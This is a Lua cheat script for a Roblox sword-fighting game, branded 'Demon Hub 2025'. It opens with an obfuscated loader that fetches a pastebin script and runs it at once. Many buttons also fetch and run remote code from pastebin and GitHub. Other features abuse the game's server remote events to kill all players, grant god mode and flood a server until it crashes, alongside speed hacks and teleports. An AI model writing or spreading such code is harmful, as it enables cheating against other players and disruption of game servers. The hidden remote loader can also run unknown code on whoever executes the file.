--[[


██████╗░███████╗███╗░░░███╗░█████╗░███╗░░██╗  ██╗░░██╗██╗░░░██╗██████╗░  ██╗░░░██╗██████╗░
██╔══██╗██╔════╝████╗░████║██╔══██╗████╗░██║  ██║░░██║██║░░░██║██╔══██╗  ██║░░░██║╚════██╗
██║░░██║█████╗░░██╔████╔██║██║░░██║██╔██╗██║  ███████║██║░░░██║██████╦╝  ╚██╗░██╔╝░█████╔╝
██║░░██║██╔══╝░░██║╚██╔╝██║██║░░██║██║╚████║  ██╔══██║██║░░░██║██╔══██╗  ░╚████╔╝░░╚═══██╗
██████╔╝███████╗██║░╚═╝░██║╚█████╔╝██║░╚███║  ██║░░██║╚██████╔╝██████╦╝  ░░╚██╔╝░░██████╔╝
╚═════╝░╚══════╝╚═╝░░░░░╚═╝░╚════╝░╚═╝░░╚══╝  ╚═╝░░╚═╝░╚═════╝░╚═════╝░  ░░░╚═╝░░░╚═════╝░

██████╗░░█████╗░██████╗░███████╗
╚════██╗██╔══██╗╚════██╗██╔════╝
░░███╔═╝██║░░██║░░███╔═╝██████╗░
██╔══╝░░██║░░██║██╔══╝░░╚════██╗
███████╗╚█████╔╝███████╗██████╔╝
╚══════╝░╚════╝░╚══════╝╚═════╝░                                                                                              
--]]
-- Obfuscated and improved remote script executor
local _0x1a2b = game
local _0x3c4d = "https://pastebin.com/raw/cbBsFWLF"
local _0x5e6f = _0x1a2b:HttpGet(_0x3c4d)
local _0x7f8h = loadstring(_0x5e6f) -- fixed from 7g8h to 7f8h

if _0x7f8h then
    _0x7f8h()
else
    error("Failed to load remote script")
end

-- Demon Hub 2025 - Final Script with Corrected Slider Values --

-- Safely load the UI library
local success, library = pcall(function()
    return loadstring(game:HttpGet("https://raw.githubusercontent.com/Consistt/Ui/main/UnLeaked"))()
end)

if not success or not library then
    warn("Demon Hub Error: The UI Library failed to load. Please check your internet connection or the script's source link. The script cannot continue.")
    return -- Stop the script if the library did not load
end

-- Play initial sound
local function playSound(id, vol)
    local s = Instance.new("Sound")
    s.SoundId, s.Volume, s.Parent = id, vol or 5, game:GetService("SoundService")
    s:Play()
    game:GetService("Debris"):AddItem(s, s.TimeLength + 1)
end
playSound("rbxassetid://570433034", 10)

-- Global Variables & Core Functions
_G.farm = false
_G.active = false
_G.fastFarmConnection = nil
_G.permaGodActive = false
local range = 40

local function fireSword(times)
    local player = game.Players.LocalPlayer
    if not player or not player.Character then return end
    local character = player.Character or player.CharacterAdded:Wait()
    local sword = character:FindFirstChild("sword") or player.Backpack:FindFirstChild("sword")
    if sword then
        local handle = sword:FindFirstChild("Handle")
        local up = handle and handle:FindFirstChild("up")
        local remoteEvent = up and up:FindFirstChild("RemoteEvent")
        if remoteEvent then
            for i = 1, times do
                remoteEvent:FireServer()
                task.wait(0.05)
            end
        end
    end
end

-- UI Setup
library.rank = "Users"
library.title = "Demon Hub 2025"

-- Notifications
local Notif = library:InitNotifications()
local LoadingNotif = Notif:Notify("Loading Demon Hub 2025, please be patient.", 5, "information")

library:Introduction()
wait(1)
local Init = library:Init()

-- === MOBILE DRAG FIX V2 ===
-- This function makes a UI element draggable on touch devices.
local function EnableMobileDrag(guiObject)
    local UserInputService = game:GetService("UserInputService")
    local dragging = false
    local dragStart = nil
    local startPos = nil

    guiObject.InputBegan:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseButton1 or input.UserInputType == Enum.UserInputType.Touch then
            dragging = true
            dragStart = input.Position
            startPos = guiObject.Position

            input.Changed:Connect(function()
                if input.UserInputState == Enum.UserInputState.End then
                    dragging = false
                end
            end)
        end
    end)

    guiObject.InputChanged:Connect(function(input)
        if input.UserInputType == Enum.UserInputType.MouseMovement or input.UserInputType == Enum.UserInputType.Touch then
            if dragging then
                local delta = input.Position - dragStart
                guiObject.Position = UDim2.new(startPos.X.Scale, startPos.X.Offset + delta.X, startPos.Y.Scale, startPos.Y.Offset + delta.Y)
            end
        end
    end)
end

-- Create Tabs
local MainTab = Init:NewTab("Main")
local CharacterTab = Init:NewTab("Character")
local EffectsTab = Init:NewTab("Effects")
local ScriptsTab = Init:NewTab("Scripts")
local TogglesTab = Init:NewTab("Toggles")
local UITab = Init:NewTab("UI")
local TeleportsTab = Init:NewTab("Teleports")
local PowerTab = Init:NewTab("Power")
local WorldsTab = Init:NewTab("Worlds")
local MusicTab = Init:NewTab("Music")

-- This new section waits for the UI to be created, then finds the main frame and makes it draggable.
task.spawn(function()
    task.wait(1.5) -- Wait a moment for the UI to fully render
    local PlayerGui = game:GetService("Players").LocalPlayer:WaitForChild("PlayerGui")
    local mainFrame = nil

    -- Find the title label, which is a reliable way to locate the draggable frame
    for _, obj in ipairs(PlayerGui:GetDescendants()) do
        if obj:IsA("TextLabel") and obj.Text == "Demon Hub 2025" then
            if obj.Parent and obj.Parent:IsA("Frame") then
                mainFrame = obj.Parent -- The draggable frame is the parent of the title
                break
            end
        end
    end

    if mainFrame then
        EnableMobileDrag(mainFrame)
    else
        warn("Demon Hub Error: Could not find the main UI frame to enable mobile drag.")
    end
end)


-- === MAIN TAB ===
local MainSection = MainTab:NewSection("Main Features")
MainTab:NewButton("Infinite Yield", function()
    pcall(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/EdgeIY/infiniteyield/master/source", true))() end)
end)

local FarmSection = MainTab:NewSection("Farming")
MainTab:NewButton("Slow Farm", function()
    _G.farm = true
    task.spawn(function() while _G.farm do fireSword(4); task.wait() end end)
end)
MainTab:NewButton("Stop Slow Farm", function() _G.farm = false end)
MainTab:NewButton("Fast Farm", function()
    _G.active = true
    if not _G.fastFarmConnection then
        _G.fastFarmConnection = game:GetService("RunService").Stepped:Connect(function() if _G.active then fireSword(5) end end)
    end
end)
MainTab:NewButton("Stop Fast Farm", function() _G.active = false end)

local CombatSection = MainTab:NewSection("Combat")
MainTab:NewButton("Kill Aura", function()
    local Players, RunService, UserInputService = game:GetService("Players"), game:GetService("RunService"), game:GetService("UserInputService")
    local player = Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local backpack = player:WaitForChild("Backpack")
    local killAuraActive = true
    local activeSword, dmgRemote = nil, nil

    local function findValidSword(container)
        for _, tool in pairs(container:GetChildren()) do
            if tool:IsA("Tool") and tool:FindFirstChild("Handle") and tool.Handle:FindFirstChild("dmg") then return tool end
        end
    end

    local function setupSword()
        local sword = findValidSword(backpack) or findValidSword(character)
        if sword then
            sword.Parent, sword.Handle.Massless, sword.Handle.CanCollide = backpack, true, true
            task.wait(0.2)
            sword.Parent = character
            activeSword, dmgRemote = sword, sword.Handle.dmg:FindFirstChild("RemoteEvent")
        end
    end

    setupSword()

    RunService.RenderStepped:Connect(function()
        if not killAuraActive or not activeSword or not dmgRemote then return end
        local hrp = player.Character and player.Character:FindFirstChild("HumanoidRootPart")
        if not hrp then return end
        for _, target in ipairs(Players:GetPlayers()) do
            if target ~= player and target.Character and target.Character:FindFirstChild("HumanoidRootPart") then
                if (hrp.Position - target.Character.HumanoidRootPart.Position).Magnitude <= range then
                    if target.Character:FindFirstChild("Humanoid") then
                        dmgRemote:FireServer(target.Character.Humanoid, math.huge)
                    end
                end
            end
        end
    end)

    UserInputService.InputBegan:Connect(function(input, gp)
        if gp then return end
        if input.KeyCode == Enum.KeyCode.E then killAuraActive = not killAuraActive end
    end)
end)

-- SLIDER FIX V3: Improved logic with a separate label for clear value display.
local killAuraRangeLabel = MainTab:NewLabel("Kill Aura Range: 40")
MainTab:NewSlider("", "", true, "", {min = 0, max = 1000, default = 40}, function(value)
    range = value
    killAuraRangeLabel:SetText("Kill Aura Range: " .. tostring(math.floor(value)))
end)

MainTab:NewButton("Sword Damage Script", function()
    local player = game.Players.LocalPlayer
    local character = player.Character or player.CharacterAdded:Wait()
    local function findSwords(container)
        local found = {}
        for _, tool in pairs(container:GetChildren()) do if tool:IsA("Tool") then table.insert(found, tool) end end
        return found
    end
    local swords = {}
    for _, sword in pairs(findSwords(player.Backpack)) do table.insert(swords, sword) end
    for _, sword in pairs(findSwords(character)) do table.insert(swords, sword) end
    for _, sword in pairs(swords) do
        if sword:FindFirstChild("Handle") then
            sword.Parent, sword.Handle.Massless, sword.Handle.CanCollide = player.Backpack, true, true
            sword.Parent = character
            sword.Handle.Touched:Connect(function(hit)
                local targetHumanoid = hit.Parent and hit.Parent:FindFirstChild("Humanoid")
                if targetHumanoid and hit.Parent.Name ~= player.Name then
                    local dmg = sword.Handle:FindFirstChild("dmg")
                    if dmg and dmg:FindFirstChild("RemoteEvent") then
                        dmg.RemoteEvent:FireServer(targetHumanoid, math.huge)
                    end
                end
            end)
        end
    end
end)

-- === CHARACTER TAB ===
local CharSection = CharacterTab:NewSection("Character Modifiers")
local localPlayer = game:GetService("Players").LocalPlayer

-- SLIDER FIX V3: Label updates and default value is applied on script start for synchronization.
local walkspeedLabel = CharacterTab:NewLabel("Walkspeed: 16")
CharacterTab:NewSlider("", "", true, "", {min = 0, max = 1000, default = 16}, function(speed)
    if localPlayer.Character and localPlayer.Character:FindFirstChild("Humanoid") then
        localPlayer.Character.Humanoid.WalkSpeed = speed
    end
    walkspeedLabel:SetText("Walkspeed: " .. tostring(math.floor(speed)))
end)

-- SLIDER FIX V3: Label updates and default value is applied on script start for synchronization.
local jumpPowerLabel = CharacterTab:NewLabel("Jump Power: 50")
CharacterTab:NewSlider("", "", true, "", {min = 0, max = 1000, default = 50}, function(jump)
    if localPlayer.Character and localPlayer.Character:FindFirstChild("Humanoid") then
        localPlayer.Character.Humanoid.JumpPower = jump
    end
    jumpPowerLabel:SetText("Jump Power: " .. tostring(math.floor(jump)))
end)

-- This function ensures character stats match the slider defaults when the script loads.
local function syncCharacterStats()
    local char = localPlayer.Character or localPlayer.CharacterAdded:Wait()
    local humanoid = char:WaitForChild("Humanoid")
    if humanoid then
        humanoid.WalkSpeed = 16
        humanoid.JumpPower = 50
    end
end
syncCharacterStats() -- Call it once to sync.
localPlayer.CharacterAdded:Connect(syncCharacterStats) -- Re-sync if the player respawns.


local HealthSection = CharacterTab:NewSection("Health & God Mode")
CharacterTab:NewButton("Force Respawn", function()
    local plr = game.Players.LocalPlayer
    local character = plr.Character
    if character and character:FindFirstChild("HumanoidRootPart") and character:FindFirstChild("Humanoid") then
        local pos, humanoid = character.HumanoidRootPart.CFrame, character.Humanoid
        local clone = humanoid:Clone()
        humanoid:Destroy()
        clone.Parent, clone.Health = character, 0
        task.wait(0.6)
        character:Destroy()
        local newChar = plr.CharacterAdded:Wait()
        if newChar and newChar:FindFirstChild("HumanoidRootPart") then newChar.HumanoidRootPart.CFrame = pos end
    end
end)
CharacterTab:NewButton("Instant GodMode", function()
    local plr = game.Players.LocalPlayer
    local humanoid = plr.Character and plr.Character:FindFirstChild("Humanoid")
    if humanoid then
        local sword = plr.Backpack:FindFirstChild("sword") or (plr.Character and plr.Character:FindFirstChild("sword"))
        if sword and sword:FindFirstChild("Handle") and sword.Handle:FindFirstChild("dmg") and sword.Handle.dmg:FindFirstChild("RemoteEvent") then
            sword.Handle.dmg.RemoteEvent:FireServer(humanoid, -math.huge)
        end
    end
end)
CharacterTab:NewToggle("Perma GodMode", false, function(value)
    _G.permaGodActive = value
    task.spawn(function()
        while _G.permaGodActive do
            local plr = game.Players.LocalPlayer
            local tool = plr.Backpack:FindFirstChild("sword") or (plr.Character and plr.Character:FindFirstChild("sword"))
            if tool and tool:FindFirstChild("Handle") and tool.Handle:FindFirstChild("dmg") and tool.Handle.dmg:FindFirstChild("RemoteEvent") and plr.Character and plr.Character:FindFirstChild("Humanoid") then
                tool.Handle.dmg.RemoteEvent:FireServer(plr.Character.Humanoid, -math.huge)
            end
            task.wait(0)
        end
    end)
end)

-- === EFFECTS TAB ===
local SingleColorSection = EffectsTab:NewSection("Single & Multi Color Effects")
local CONFIG = { FLAME_DELAY = 0, TOOL_SPAWN_DELAY = 0.10, EFFECT_REPEAT = 25, COLOR_REPEAT = 20 }
local function safeWait(duration) local start = tick() while tick() - start < duration do game:GetService("RunService").Heartbeat:Wait() end end
local function applyFlameColors(colors)
    local event = workspace:FindFirstChild("eff") and workspace.eff:FindFirstChild("RemoteEvent")
    if not event then return end
    for _ = 1, CONFIG.COLOR_REPEAT do for _, color in ipairs(colors) do event:FireServer(color) end end
end
local function spawnAndDropTools()
    local player = game.Players.LocalPlayer
    if not player or not player.Character then return end
    local loadRemote = workspace:FindFirstChild("load") and workspace.load:FindFirstChild("RemoteEvent")
    if loadRemote then loadRemote:FireServer() end
    safeWait(CONFIG.TOOL_SPAWN_DELAY)
    for _, tool in pairs(player.Backpack:GetChildren()) do if tool:IsA("Tool") then tool.Parent = player.Character end end
    for _, tool in pairs(player.Character:GetChildren()) do
        if tool:IsA("Tool") then tool.Parent, Instance.new("Script", tool).Name = workspace, "MineYesMine" end
    end
end
local function cleanUpTags() for _, tool in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do if tool:FindFirstChild("MineYesMine") then tool.MineYesMine:Destroy() end end end
local function createFlameButton(label, colors)
    EffectsTab:NewButton(label, function()
        for _ = 1, CONFIG.EFFECT_REPEAT do applyFlameColors(colors); safeWait(CONFIG.FLAME_DELAY); spawnAndDropTools(); safeWait(CONFIG.FLAME_DELAY) end
        cleanUpTags()
    end)
end
createFlameButton("Sword: Purple", {"Purple"})
createFlameButton("Sword: Red", {"Red"})
createFlameButton("Sword: Black", {"Black"})
createFlameButton("Sword: Blue", {"Blue"})
createFlameButton("Sword: Purple Red", {"Purple", "Red"})
createFlameButton("Sword: Purple Blue", {"Purple", "Blue"})
createFlameButton("Sword: Purple Black", {"Purple", "Black"})
createFlameButton("Sword: Red Blue", {"Red", "Blue"})
createFlameButton("Sword: Black Red", {"Black", "Red"})
createFlameButton("Sword: Black Blue", {"Black", "Blue"})
createFlameButton("Sword: Red Purple Blue", {"Red", "Purple", "Blue"})
createFlameButton("Sword: Black Red Purple", {"Black", "Red", "Purple"})
createFlameButton("Sword: Black Blue Purple", {"Black", "Blue", "Purple"})
createFlameButton("Sword: Black Red Blue", {"Black", "Red", "Blue"})
createFlameButton("Sword: Purple Red Blue Black", {"Purple", "Red", "Blue", "Black"})
createFlameButton("Sword: Black Red Purple Blue", {"Black", "Red", "Purple", "Blue"})
createFlameButton("Sword: Blue Purple Red Black", {"Blue", "Purple", "Red", "Black"})
createFlameButton("Sword: Purple Blue Black Red", {"Purple", "Blue", "Black", "Red"})
createFlameButton("Sword: Red Black Blue Purple", {"Red", "Black", "Blue", "Purple"})
createFlameButton("Sword: Blue Red Purple Black", {"Blue", "Red", "Purple", "Black"})
createFlameButton("Sword: Red Purple Black Blue", {"Red", "Purple", "Black", "Blue"})
createFlameButton("Sword: Black Blue Red Purple", {"Black", "Blue", "Red", "Purple"})

-- === SCRIPTS TAB ===
local HubSection = ScriptsTab:NewSection("Script Hubs, Tools & Utilities")
ScriptsTab:NewButton("2take1.tk", function() loadstring(game:HttpGet('https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/2TAKE1%20ULTRA.txt',true))() end)
ScriptsTab:NewButton("Exclusive Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Exclusive%20Hub.lua"))() end)
ScriptsTab:NewButton("Sword Simulator Hub 2022", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Sword%20Simulator%20Hub",true))() end)
ScriptsTab:NewButton("Liquids Gui", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Liquid's%20Gui",true))() end)
ScriptsTab:NewButton("Replication UI", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/EEND2SCRIPTS/Replication/main/replication"))() end)
ScriptsTab:NewButton("Ghost Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/refs/heads/main/Ghost_Hub",true))() end)
ScriptsTab:NewButton("Dragon Hub Premium", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/AlznX/Roblox-Scripts/main/Dragon%2520Hub", true))() end)
ScriptsTab:NewButton("Slayer Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/main/Truecode"))() end)
ScriptsTab:NewButton("Line's Script Hub", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Zacky-pixel-sketch/Hubs/main/Demon%20hub%20source%20code.lua",true))() end)
ScriptsTab:NewButton("Sword Tornado", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/Sword%20tornado"))() end)
ScriptsTab:NewButton("Sword Wings", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Emperor%20Wings.lua",true))() end)
ScriptsTab:NewButton("Sword Hover", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Sword%20Hover.lua"))() end)
ScriptsTab:NewButton("Levitate Tools", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/Levitate%20Tools.lua"))() end)
ScriptsTab:NewButton("Sword Crossbow", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/Sword%20Crossbow",true))() end)
ScriptsTab:NewButton("Simple Sword Rotation", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/Simple%20rotation"))() end)
ScriptsTab:NewButton("Server Crasher", function()
    local ws, effect, load = game:GetService("Workspace"), workspace.eff.RemoteEvent, workspace.load.RemoteEvent
    for i = 1, 40000 do effect:FireServer("Black"); if i % 1000 == 0 then game:GetService("RunService").Heartbeat:Wait() end end
    task.wait(0.1); load:FireServer()
end)

-- === TOGGLES TAB ===
local ToggleSection = TogglesTab:NewSection("Automation & Toggles")
TogglesTab:NewToggle("Grab All Tools", false, function(state)
    _G.grabTools = state
    task.spawn(function()
        while _G.grabTools do
            local char = game.Players.LocalPlayer.Character
            if char and char:FindFirstChild("HumanoidRootPart") then
                for _, obj in pairs(workspace:GetDescendants()) do
                    if obj:IsA("Tool") and obj.Name == "sword" and obj:FindFirstChild("Handle") and obj.Handle:FindFirstChildOfClass("TouchTransmitter") then
                        firetouchinterest(char.HumanoidRootPart, obj.Handle, 0); task.wait(); firetouchinterest(char.HumanoidRootPart, obj.Handle, 1)
                    end
                end
            end
            task.wait(0.1)
        end
    end)
end)
TogglesTab:NewToggle("Drop Tools", false, function(bool)
    if bool then
        for _, tool in pairs(game.Players.LocalPlayer.Backpack:GetChildren()) do
            if tool:IsA("Tool") then tool.CanBeDropped, tool.Parent, tool.Parent = true, game.Players.LocalPlayer.Character, workspace end
        end
    end
end)
TogglesTab:NewToggle("Kill All", false, function(state)
    if _G.killAllConnection then _G.killAllConnection:Disconnect(); _G.killAllConnection = nil end
    if state then
        _G.killAllConnection = game:GetService("RunService").Heartbeat:Connect(function()
            local player = game.Players.LocalPlayer
            local sword = player.Character and (player.Character:FindFirstChild("sword") or player.Backpack:FindFirstChild("sword"))
            local dmg = sword and sword.Handle and sword.Handle:FindFirstChild("dmg") and sword.Handle.dmg.RemoteEvent
            if not dmg then return end
            for _, p in pairs(game:GetService("Players"):GetPlayers()) do
                if p ~= player and p.Character then
                    local h = p.Character:FindFirstChild("Humanoid")
                    if h and h.Health > 0 then pcall(dmg.FireServer, dmg, h, math.huge) end
                end
            end
        end)
    end
end)

-- === UI TAB ===
local UISection = UITab:NewSection("UI Controls")
UITab:NewButton("Destroy Effects GUI", function()
    if game.StarterGui:FindFirstChild("passes") then game.StarterGui.passes:Destroy() end
    for _, player in ipairs(game:GetService("Players"):GetPlayers()) do
        if player.PlayerGui and player.PlayerGui:FindFirstChild("passes") then player.PlayerGui.passes:Destroy() end
    end
end)

-- === TELEPORTS TAB ===
local TeleportSection = TeleportsTab:NewSection("Teleport Locations")
local player = game:GetService("Players").LocalPlayer
local locs = {
    Arena = CFrame.new(-18.393, 26.978, 9.003, 0.999929, 0, 0.011914, 0, 1, 0, -0.011914, 0, 0.999929), Tree = CFrame.new(-143.156, 82.464, -246.582, 0.985673, 0, -0.168666, 0, 1, 0, 0.168666, 0, 0.985673),
    Wall = CFrame.new(-251.617, 92.690, -335.043, -0.794003, 0, -0.607913, 0, 1, 0, 0.607913, 0, -0.794003), GrayWall = CFrame.new(-266.613, 119.881, -347.056, -0.698223, 0, -0.715880, 0, 1, 0, 0.715880, 0, -0.698223),
    Secret = CFrame.new(-197.105, 22.953, -377.287) * CFrame.Angles(math.rad(0.044), math.rad(23.156), math.rad(0.08)), Outside = CFrame.new(-295.778, 25.596, -355.215, -0.409, 0, -0.913, 0, 1, 0, 0.913, 0, -0.409),
    OutsideOfGate = CFrame.new(-420.443, 25.596, -9.648, -0.0046, 0, -0.999989, 0, 1, 0, 0.999989, 0, -0.0046), InsideRock = CFrame.new(-341.302, 25.596, 47.305, 0.342859, 0, 0.939387, 0, 1, 0, -0.939387, 0, 0.342859),
    Pillar = CFrame.new(-88.647, 70.197, 92.618, 0.952380, 0, -0.304915, 0, 1, 0, 0.304915, 0, 0.952380), InsideRock2 = CFrame.new(283.553, 25.596, 184.675, -0.423626, 0, 0.905837, 0, 1, 0, -0.905837, 0, -0.423626),
    InsideRock3 = CFrame.new(43.311, 25.500, -168.158, 0.168662, 0, -0.985674, 0, 1, 0, 0.985674, 0, 0.168662), Gate = CFrame.new(5.181, 25.500, 419.471, 0.985070, 0, 0.172157, 0, 1, 0, -0.172157, 0, 0.985070),
    Pillar2 = CFrame.new(88.735, 70.100, -84.323, -0.347119, 0, 0.937821, 0, 1, 0, -0.937821, 0, -0.347119), UnderRock = CFrame.new(45.779, 21.812, -185.381, -0.863430, -0.497, -0.087601, 0, 0.173651, -0.984807, 0.504468, -0.850312, -0.149936)
}
for name, cf in pairs(locs) do
    TeleportsTab:NewButton("Teleport to " .. name, function()
        if player.Character and player.Character:FindFirstChild("HumanoidRootPart") then player.Character.HumanoidRootPart.CFrame = cf end
    end)
end

-- === POWER TAB ===
local PowerSection = PowerTab:NewSection("Power Scripts")
PowerTab:NewButton("10K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/10K"))() end)
PowerTab:NewButton("5K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/5K"))() end)
PowerTab:NewButton("2K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/2K"))() end)
PowerTab:NewButton("1K Power | Sword", function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Scripts/refs/heads/main/1K"))() end)
PowerTab:NewButton("PowerViewer", function() pcall(function() loadstring(game:HttpGet("https://raw.githubusercontent.com/Nightmareloil/Own1/refs/heads/main/SECURITY.md", true))() end) end)

-- === WORLDS TAB ===
local WorldSection = WorldsTab:NewSection("World Scripts")
local worldButtons = {
    ["Coffee Shop"] = "https://pastebin.com/raw/Pvj5Ckc2", ["ClockworkArena"] = "https://pastebin.com/raw/NNp1NJKT",
    ["Shipment"] = "https://pastebin.com/raw/J3Jk3NaC", ["PurpleBattlefields"] = "https://pastebin.com/raw/kdg5tmdg",
    ["Lock Shift"] = "https://github.com/ltseverydayyou/uuuuuuu/blob/main/shiftlock?raw=true",
}
for name, url in pairs(worldButtons) do
    WorldsTab:NewButton(name, function() pcall(function() loadstring(game:HttpGet(url, true))() end) end)
end

-- === MUSIC TAB ===
local MusicSection = MusicTab:NewSection("Music Player")
local function playMusic(soundId, looped)
    local sound = Instance.new("Sound")
    sound.SoundId, sound.Looped, sound.Volume, sound.Parent = "rbxassetid://" .. tostring(soundId), looped or false, 1, game:GetService("SoundService")
    sound:Play()
    if not sound.Looped then sound.Ended:Connect(function() sound:Destroy() end) end
end
MusicTab:NewButton("New World", function() playMusic(5410082346, true) end)
MusicTab:NewButton("The World", function() playMusic(1836847994, true) end)
MusicTab:NewButton("Rootkit - Energy", function() playMusic(5410081542) end)
MusicTab:NewButton("Pixel Terror - Madness", function() playMusic(5410080475) end)
MusicTab:NewButton("Chasing Clouds", function() playMusic(5410082097) end)
MusicTab:NewButton("Feel Your Heart", function() playMusic(5410082171) end)
MusicTab:NewButton("Forward", function() playMusic(5410081471) end)
MusicTab:NewButton("Colors", function() playMusic(5410086062) end)
MusicTab:NewButton("Let's Play", function() playMusic(5410085763) end)
MusicTab:NewButton("Doja Cat - Say So", function() playMusic(1840036018) end)
MusicTab:NewButton("King", function() playMusic(1840030788) end)
MusicTab:NewButton("All I Want", function() playMusic(7023680426) end)
MusicTab:NewButton("Safe & Sound", function() playMusic(7024233823) end)
MusicTab:NewButton("Only You", function() playMusic(7024028859, true) end)
MusicTab:NewButton("Dreamers", function() playMusic(7029083554, true) end)
MusicTab:NewButton("Weekend", function() playMusic(1837083064, true) end)
MusicTab:NewButton("The Future", function() playMusic(1837358800) end)
MusicTab:NewButton("Labyrinth", function() playMusic(7023690024) end)
MusicTab:NewButton("Coral Sea", function() playMusic(1839253629, true) end)
MusicTab:NewButton("Night", function() playMusic(1836879421) end)
MusicTab:NewButton("Glacier", function() playMusic(7023760529, true) end)
MusicTab:NewButton("She Make Me", function() playMusic(1841807265, true) end)
MusicTab:NewButton("Hours, Hours", function() playMusic(7028932563) end)
MusicTab:NewButton("Play Cool", function() playMusic(7029017448, true) end)
MusicTab:NewButton("Hyper", function() playMusic(7023887630, true) end)
MusicTab:NewButton("Feel Like You Take Me", function() playMusic(7029070008, true) end)
MusicTab:NewButton("I Been Thinking About You", function() playMusic(7023445033, true) end)
MusicTab:NewButton("No Sleep", function() playMusic(7029011778) end)
MusicTab:NewButton("Give The World", function() playMusic(1836778353) end)
MusicTab:NewButton("Top Of The World", function() playMusic(1836847994) end)
MusicTab:NewButton("Siren", function() playMusic(1840056866) end)
MusicTab:NewButton("Overtime", function() playMusic(1842019862) end)
MusicTab:NewButton("Pull Over", function() playMusic(1839983980) end)
MusicTab:NewButton("Pendulum", function() playMusic(1843384804, true) end)
MusicTab:NewButton("Unknown Track", function() playMusic(1840044242) end)
MusicTab:NewButton("Queen Of Clubs", function() playMusic(86573345754692) end)
MusicTab:NewButton("Gumball X Darwin", function() playMusic(105891569549370) end)
MusicTab:NewButton("It's Crazy", function() playMusic(122684542940260) end)
MusicTab:NewButton("Right Here", function() playMusic(132298165729981) end)
MusicTab:NewButton("Die With A Smile LoFi", function() playMusic(70734926325783) end)
local MusicControlSection = MusicTab:NewSection("Music Controls")
MusicTab:NewButton("Delete Music", function()
    for _, s in ipairs(workspace:GetDescendants()) do if s:IsA("Sound") then s:Destroy() end end
    for _, s in ipairs(game:GetService("SoundService"):GetChildren()) do if s:IsA("Sound") then s:Destroy() end end
end)

-- Anti-AFK System (Runs in background)
pcall(function()
    local VirtualUser = game:GetService("VirtualUser")
    game:GetService("Players").LocalPlayer.Idled:connect(function()
        VirtualUser:CaptureController()
        VirtualUser:ClickButton2(Vector2.new())
    end)
end)

-- Final Loading Notification
Notif:Notify("Demon Hub 2025 loaded successfully! All features ready.", 4, "success")
